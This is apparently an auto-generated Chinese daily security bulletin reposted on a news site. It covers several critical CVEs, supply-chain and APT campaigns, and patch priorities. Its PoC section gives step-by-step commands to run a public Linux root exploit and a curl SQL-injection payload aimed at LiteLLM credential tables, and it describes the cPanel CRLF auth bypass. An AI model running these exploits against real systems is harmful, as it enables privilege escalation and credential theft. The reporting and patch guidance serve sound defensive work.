当前位置: 首页 > news >正文

每日安全情报报告 · 2026-04-30

每日安全情报报告 · 2026-04-30

报告日期:2026年04月30日 |风险等级汇总:🔴 严重×4 🟠 高危×2
本期焦点:Linux 内核 "Copy Fail" 零日全版本通杀 / cPanel 认证绕过在野利用 / Windows Shell 零点击哈希窃取 CISA 预警 / AI 网关 LiteLLM SQL 注入 36 小时内遭实战利用


一、高危漏洞速报

🔴 CVE-2026-31431 — Linux 内核 "Copy Fail" 本地提权(LPE)

属性详情
漏洞类型内核逻辑缺陷 / 本地权限提升 (LPE) / 容器逃逸
受影响组件Linux Kernel(authencesn 模块,AF_ALG + splice() 链式调用)
CVSS 评分9.8(严重)
披露日期2026-04-29
发现者Xint Code(Theori 公司)
在野利用⚠️POC 已公开,漏洞静默存在近 10 年

漏洞描述authencesn加密模块中存在直线型逻辑缺陷,攻击者通过组合AF_ALG套接字与splice()系统调用,可实现 4 字节页缓存(page-cache)任意写入,进而篡改 setuid 二进制文件,最终获取 root shell。无需竞态条件,732 字节 Python 脚本即可通杀 2017 年以来所有主流 Linux 发行版(Ubuntu、Amazon Linux、RHEL、SUSE、Debian、Arch 等)。

影响范围
- Ubuntu 24.04 LTS / Amazon Linux 2023 / RHEL 10.1 / SUSE 16 及以上发行版
- 所有使用默认内核配置(AF_ALG 默认启用)的 Linux 系统
- 可用于容器逃逸,威胁多租户云环境

修复建议
1. 升级内核至包含主线提交a664bf3d603d的版本
2. 临时缓解:禁用algif_aead模块
bash echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true
3. 容器/沙箱环境通过seccomp限制 AF_ALG 套接字创建

🔗 NVD 漏洞详情 | 官方披露页面 | 腾讯云安全通告


🔴 CVE-2026-41940 — cPanel & WHM 认证绕过(已在野利用)

属性详情
漏洞类型CRLF 注入 / 认证绕过
受影响组件cPanel & WHM(v11.110.x ~ v11.136.x)/ WP Squared
CVSS 评分9.8(严重)
披露日期2026-04-28
在野利用⚠️已确认在野利用,疑似零日活动始于 2026-02-23

漏洞描述:cPanel 守护进程cpsrvd在认证发生之前将新会话写入磁盘,且未对用户输入进行消毒处理。攻击者可通过恶意构造的 Basic Authorization 头注入原始\r\n字符,在会话文件中插入任意属性(如user=root),触发会话重新加载后获得管理员级访问权限,全程无需有效凭证。Shodan 显示约 150 万个 cPanel 实例暴露于互联网。

受影响版本与修复版本

受影响版本修复版本
cPanel & WHM 11.110.0 < 11.110.0.9711.110.0.97
cPanel & WHM 11.126.0 < 11.126.0.5411.126.0.54
cPanel & WHM 11.134.0 < 11.134.0.2011.134.0.20
cPanel & WHM 11.136.0 < 11.136.0.511.136.0.5
WP Squared 11.136.1 < 11.136.1.711.136.1.7

修复建议:立即升级至官方修复版本;临时措施可封堵 TCP 2083(cPanel)和 2087(WHM)端口。

🔗 Rapid7 分析报告 | watchTowr 技术分析 | cPanel 官方安全公告


🔴 CVE-2026-42208 — LiteLLM AI 网关预认证 SQL 注入(36 小时内在野利用)

属性详情
漏洞类型SQL 注入 / 预认证
受影响组件BerriAI LiteLLM(v1.81.16 ~ v1.83.6)
CVSS 评分9.3(严重)
披露日期2026-04-29
在野利用⚠️CVE 公开后 36 小时内发现在野利用

漏洞描述:LiteLLM 代理在 API 密钥验证流程中,将调用者提供的密值直接混入 SQL 查询文本而非参数化处理。攻击者无需任何认证,仅需在请求头注入 SQL 语法即可操纵数据库查询:

Authorization: Bearer ' OR '1'='1' --

由于 LiteLLM 通常作为 AI 网关集中管理 OpenAI、Anthropic、AWS Bedrock 等多家服务商凭证,成功利用可导致:云端 AI API 密钥批量窃取、财务损失(攻击者滥用高价值 API)及云基础设施横向移动。

修复建议

pip install --upgrade litellm==1.83.7

无法立即升级时,临时设置disable_error_logs: true

🔗 Vulert 详细分析 | Sysdig 威胁研究 | FreeBuf 报道


🔴 CVE-2026-32202 — Windows Shell 欺骗漏洞(CISA 紧急预警,零点击)

属性详情
漏洞类型NTLM 强制认证 / 欺骗漏洞(零点击)
受影响组件Windows Shell(Windows 10/11 全系列 + Windows Server)
CVSS 评分待 NVD 更新(高危)
披露日期2026-04-14(补丁发布) / 2026-04-29(CISA 确认在野利用)
在野利用⚠️CISA 确认在野利用,已加入 KEV 目录

漏洞描述:本漏洞为 CVE-2026-21510 的不完整补丁绕过。受害者仅需在 Windows 资源管理器中打开包含恶意 LNK 文件的文件夹(无需点击),Explorer 在渲染图标时自动发起 SMB 连接至攻击者服务器,触发 NTLM 认证握手,泄露 Net-NTLMv2 哈希。攻击者可利用哈希进行 NTLM 中继攻击或离线破解,实现横向移动。

关键时间线:4月14日微软发布补丁时未标记"已被利用",导致大量组织未优先修复,两周后 CISA 确认漏洞被活跃利用。

修复建议:立即安装 2026-04-14 微软补丁;网络层封堵出站 SMB(445/TCP)流量;限制 NTLM 在内网的使用范围。

🔗 CISA KEV 目录 | Help Net Security 分析 | The Hacker News 报道


🟠 CVE-2026-25874 — Hugging Face LeRobot 未修复 RCE(无需认证)

属性详情
漏洞类型Pickle 反序列化 / 远程代码执行
受影响组件Hugging Face LeRobot(近 24,000 GitHub Stars,暂无修复版本)
CVSS 评分9.8(严重)
披露日期2026-04-28
补丁状态尚未修复,官方正在评估

漏洞描述:LeRobot 异步推理架构中存在"无认证 gRPC + 不安全 Pickle 反序列化"危险组合(CVE-2026-25874)。攻击者可通过发送特制的 gRPC 请求,触发 Pickle 反序列化链,在目标机器上执行任意代码,无需任何凭证。广泛用于 AI 驱动的机器人研究场景,一旦被利用可导致实验室/生产机器人系统被完全接管。

🔗 The Hacker News 报道 | CSDN 分析 | NVD 详情


🟠 CVE-2026-1868 — GitLab AI Gateway 模板注入 RCE

属性详情
漏洞类型模板注入 / 拒绝服务 / 远程代码执行
受影响组件GitLab Duo Self-Hosted AI Gateway(v18.1.6 ~ v18.8.0)
CVSS 评分9.9(严重)
披露日期2026-02-08(持续关注中)

漏洞描述:GitLab Duo Workflow Service 在处理用户提供的 Agent Platform Flow 定义时,未对模板内容进行充分过滤,导致模板注入漏洞。在最坏情况下可实现网关层面的远程代码执行(RCE),亦可触发拒绝服务,影响所有部署自托管 AI Gateway 的 GitLab 企业用户。

🔗 FreeBuf 分析 | 阿里云 AVD 详情 | GitLab 安全公告


二、漏洞 PoC 速递

PoC 1:CVE-2026-31431 "Copy Fail" — 732 字节 Python 脚本通杀所有 Linux

来源:Theori(Xint Code 团队)
GitHub 仓库:theori-io/copy-fail-CVE-2026-31431
风险等级:🔴 严重(直接获取 root shell,无需竞态条件)

利用原理:通过AF_ALG套接字与splice()系统调用的组合,实现对/usr/bin/su等 setuid 二进制文件的页缓存(page-cache)任意写入,篡改后直接执行获取 root 权限。

使用步骤(⚠️ 仅限授权渗透测试环境):

# Step 1: 克隆 PoC 仓库 git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git cd copy-fail-CVE-2026-31431 # Step 2: 确认 Python 版本(需 Python 3.10+,仅需标准库) python3 --version # Step 3: 执行漏洞利用(默认目标:/usr/bin/su) python3 copy_fail_exp.py # 可选:指定其他 setuid 二进制作为目标 # python3 copy_fail_exp.py /usr/bin/passwd # Step 4: 脚本执行完毕后,运行 su 获取 root shell su - # id → uid=0(root)

技术细节
- 脚本仅 732 字节,依赖标准库(os,socket,zlib
- 利用algif_aead内核模块的逻辑缺陷
- 写入不持久(重启后恢复),但 root shell 真实有效
- 可作为容器逃逸原语(container escape primitive)

🔗 PoC 仓库 | Bugcrowd 技术分析 | ByteIota 详细解析


PoC 2:CVE-2026-42208 LiteLLM — 预认证 SQL 注入复现环境

来源:imjdl
GitHub 仓库:imjdl/CVE-2026-42208_lab
风险等级:🔴 严重(无需认证,可窃取 AI 平台凭证)

利用原理:LiteLLM 代理在处理 API 密钥验证时未使用参数化查询,攻击者可通过构造恶意 Authorization 头实施 SQL 注入,读取数据库中存储的所有 AI 服务商 API 密钥。

使用步骤(⚠️ 仅限授权渗透测试环境):

# Step 1: 克隆 PoC 复现实验室 git clone https://github.com/imjdl/CVE-2026-42208_lab.git cd CVE-2026-42208_lab # Step 2: 安装依赖并启动靶机环境 pip install -r requirements.txt docker-compose up -d # 或按 README 说明部署 # Step 3: 执行注入测试(向 /chat/completions 端点发送) curl -X POST http://TARGET:4000/chat/completions \ -H "Authorization: Bearer ' OR '1'='1' --" \ -H "Content-Type: application/json" \ -d '{"model": "gpt-4", "messages": [{"role": "user", "content": "test"}]}' # Step 4: 利用 SQL 注入提取凭证表数据 # 目标表:litellm_credentials.credential_values / litellm_config

实战特征:攻击者已表现出对 LiteLLM 数据库结构的了解,初步探测后定向访问/key/generate/key/info等密钥管理端点,尝试将数据库读权限转化为代理控制权。

🔗 PoC 仓库 | Sysdig 威胁分析 | Vulert 详细报告


PoC 3:CVE-2026-41940 cPanel — 认证绕过 Session 检测工具

来源:debugactiveprocess(基于 watchTowr 分析)
GitHub 仓库:debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
风险等级:🔴 严重(可获取任意 cPanel 账户管理员权限)

使用步骤(⚠️ 仅限授权资产检测):

# Step 1: 克隆 Session 检测工具 git clone https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker.git cd cPanel-WHM-AuthBypass-Session-Checker # Step 2: 安装 Python 依赖 pip install -r requirements.txt # Step 3: 对目标 cPanel 实例进行会话绕过检测 python3 session_checker.py --target https://TARGET:2087 --check # Step 4: 输出结果会显示目标是否存在会话验证缺陷 # 若确认漏洞,立即应用官方补丁(升级至修复版本)

技术要点:通过省略whostmgrsessionCookie 的预期字段并注入 CRLF 序列,在服务器端会话文件中写入user=root等任意属性,触发 cpsrvd 重新加载会话时获得管理员权限。

🔗 Session 检测工具 | watchTowr 分析 | Rapid7 ETR


三、安全圈动态

📰 文章一:朝鲜 Lazarus APT 推出 "Mach-O Man" macOS 四阶段恶意软件套件

来源:GBHackers On Security(Mayura Kathir,2026-04-29)
标签:APT / 供应链攻击 / macOS / 加密货币

朝鲜国家级 APT 组织 Lazarus Group 推出新型 macOS 恶意软件套件"Mach-O Man",采用 ClickFix 社会工程手法,通过 Telegram 冒充同事发送虚假 Zoom/Teams 会议邀请,诱导金融科技和加密货币企业高管手动复制执行终端命令。攻击链共分四阶段:初始 stager(teamsSDK.bin)→ 系统信息收集(D1YrHRTg.bin)→ macOS Keychain 及浏览器凭证窃取(macrasv2)→ 持久化(minst2.bin伪装 OneDrive 注册 LaunchAgent)。本次活动已导致多家金融科技公司的 Keychain 密钥和加密货币钱包凭证泄露。

🔗 阅读原文


📰 文章二:"Mini Shai-Hulud" SAP npm 供应链攻击:220 万月下载包遭投毒

来源:The Hacker News(2026-04-30)/ Snyk 安全团队
标签:供应链攻击 / npm / SAP / CI/CD 凭证窃取

安全研究人员披露一起自我命名为"Mini Shai-Hulud"的 npm 供应链攻击活动。攻击者篡改了 4 个 SAP CAP 生态系统相关 npm 包(月下载量超 220 万),注入混淆的预安装脚本(基于 Bun 运行时),在包安装时静默执行并窃取开发者环境变量、CI/CD secrets 及 API 密钥。OX Security 研究显示,相关凭证已泄露至超过 1,200 个代码仓库。建议立即审查项目依赖、轮换暴露凭证,并启用 npm audit 和依赖完整性校验。

🔗 The Hacker News 报道 | Snyk 技术分析 | OX Security 详情


📰 文章三:深度分析 Sorry 勒索软件的加密实现与行为特征

来源:安全客 / 360(2026-04-29)
标签:勒索软件 / 加密分析 / 恶意软件逆向

安全研究人员对新型勒索软件"Sorry"进行深度剖析,重点揭示其底层加密实现机制和网络行为特征。该勒索软件采用混合加密策略,结合 AES-256 对称加密和 RSA 非对称密钥保护方案,具备快速文件遍历能力和网络传播组件。文章包含对其 C2 通信模式、文件加密范围选择逻辑及持久化机制的详细技术分析,为企业建立针对性检测规则提供参考。

🔗 安全客原文


📰 文章四:CISA 发出紧急预警 — Windows Shell 零点击漏洞 CVE-2026-32202 正被活跃利用

来源:Help Net Security(Zeljka Zorz,2026-04-29)
标签:CISA / Windows / NTLM / 零日

CISA 将 CVE-2026-32202 加入已知利用漏洞(KEV)目录,并要求联邦机构限期修复。该漏洞为 CVE-2026-21510 不完整补丁绕过,受害者仅需打开含恶意 LNK 的文件夹,Windows Explorer 即自动建立 SMB 连接泄露 NTLMv2 哈希,APT28 等高级威胁行为者已将该技术纳入武器库。此案例再次警示:补丁管理中"已利用"标记的滞后可导致大量组织未优先响应。

🔗 阅读原文 | The Register 分析 | CISA KEV 目录


📰 文章五:AI 时代的安全新风险 — Cursor AI 扩展权限漏洞与 LeRobot RCE 双重曝光

来源:Cyber Security News / The Hacker News(2026-04-30)
标签:AI 安全 / 开发者工具 / RCE / 访问控制

2026年4月30日,两项 AI 工具高危漏洞同日曝光:其一,广泛使用的 AI 编程环境Cursor被发现访问控制漏洞(CVSS 8.2),任何已安装的扩展均可获取开发者令牌,导致完整凭证被窃;其二,Hugging Face 开源机器人学习框架LeRobot(CVE-2026-25874,CVSS 9.8)存在尚未修复的 gRPC + Pickle 反序列化组合 RCE 漏洞,无需认证即可在目标机上执行任意代码。两起事件共同揭示 AI 工具生态链安全审查不足的系统性风险。

🔗 The Hacker News LeRobot 报道 | Cursor 漏洞分析 | CVE-2026-25874 详情


四、风险处置优先级建议

优先级CVE / 事件建议行动截止时间
🔴 P0CVE-2026-31431 Linux 内核 Copy Fail升级内核 / 临时禁用 algif_aead立即
🔴 P0CVE-2026-41940 cPanel 认证绕过升级至修复版本 / 封堵 2083/2087 端口立即
🔴 P0CVE-2026-32202 Windows Shell 零点击安装 4月14日补丁 / 封堵出站 SMB24h 内
🔴 P0CVE-2026-42208 LiteLLM SQL 注入升级 litellm==1.83.7立即
🟠 P1CVE-2026-25874 LeRobot RCE(未修复)隔离 gRPC 端口 / 关注官方补丁48h 内
🟠 P1SAP npm 供应链投毒审查依赖 / 轮换 CI/CD 凭证24h 内
🟡 P2Lazarus Mach-O Man(macOS)排查 LaunchAgent / 审计 Terminal 使用本周

本报告由自动化安全情报系统生成,信息来源:NVD / CISA KEV / The Hacker News / FreeBuf / 安全客 / GBHackers / Rapid7 / Snyk / GitHub。所有 PoC 信息仅供授权安全研究使用,请遵守相关法律法规。

http://www.jsqmd.com/news/725390/

相关文章:

  • 高端学术会议策划拆解:把握六大核心要点,办会专业更省心 - 麦麦唛
  • 代码差异分析:开发者必备的核心技能与实战技巧
  • Swoole HTTP Server 的本质的庖丁解牛
  • ComfyUI-AnimateDiff-Evolved完整教程:10分钟学会AI动画制作终极指南
  • AI教材写作必备:低查重AI工具,快速生成20万字教材不再愁!
  • Mac游戏体验升级:PlayCover按键映射完整配置指南
  • 3个场景教会你高效下载Webtoon漫画:Python下载器完全指南
  • 思为无线UV双频对讲+数据通信方案-单天线简单外围电路 - 资讯焦点
  • d2s-editor:暗黑2存档编辑器终极指南,3分钟打造完美角色
  • FineReport实战:如何用下拉复选框+存储过程搞定动态数据状态切换(附完整代码)
  • 3分钟搞定:Windows电脑直接安装安卓应用的终极指南
  • 3个核心问题,为什么MPC-BE成为Windows用户的终极媒体播放解决方案
  • 合花商城客服服务富通天下:打造数字化私域平台,赋能中国外贸品牌出海! - 速递信息
  • 61页可编辑PPT | 人工智能基础知识培训
  • DLSS Swapper:3分钟解锁游戏性能潜能的终极指南
  • 告别漫画加载烦恼:3步打造个人离线漫画图书馆
  • ENACT基准:评估视觉语言模型在具身认知中的关键能力
  • 台州装修公司怎么选?从资质到工艺全维度科普 - 资讯焦点
  • NCM格式转换终极指南:让加密音乐重获自由播放的完整方案
  • Nginx反向代理踩坑实录:一个斜杠引发的‘Not Found‘血案与终极解决方案
  • 3步解决Windows苹果设备连接难题:告别iTunes臃肿安装的轻量方案
  • 124页可编辑PPT | 智能工厂设计规划及应用
  • 如何快速掌握JiYuTrainer:极域电子教室控制的终极解决方案
  • 2026年VR安全体验馆厂家十大品牌实力排名:汉安科技稳居榜首,全场景安全培训实力厂商推荐 - 资讯焦点
  • 告别Bus Hound!用QT+HIDAPI在Windows上直接读写USB设备(附完整代码)
  • 2026年实测降AI工具盘点:AI率从95%降至5.8%!10款免费高效的降AI率工具 - 降AI实验室
  • golang如何实现HSTS安全头配置_golang HSTS安全头配置实现实践
  • 拆解5G基站内部通信:手把手图解CU与DU之间的F1协议(含F1-C/F1-U全流程)
  • 实战指南:智能自动化Boot Camp驱动部署框架Brigadier企业级解决方案
  • FanControl终极指南:3步解决华硕主板传感器识别难题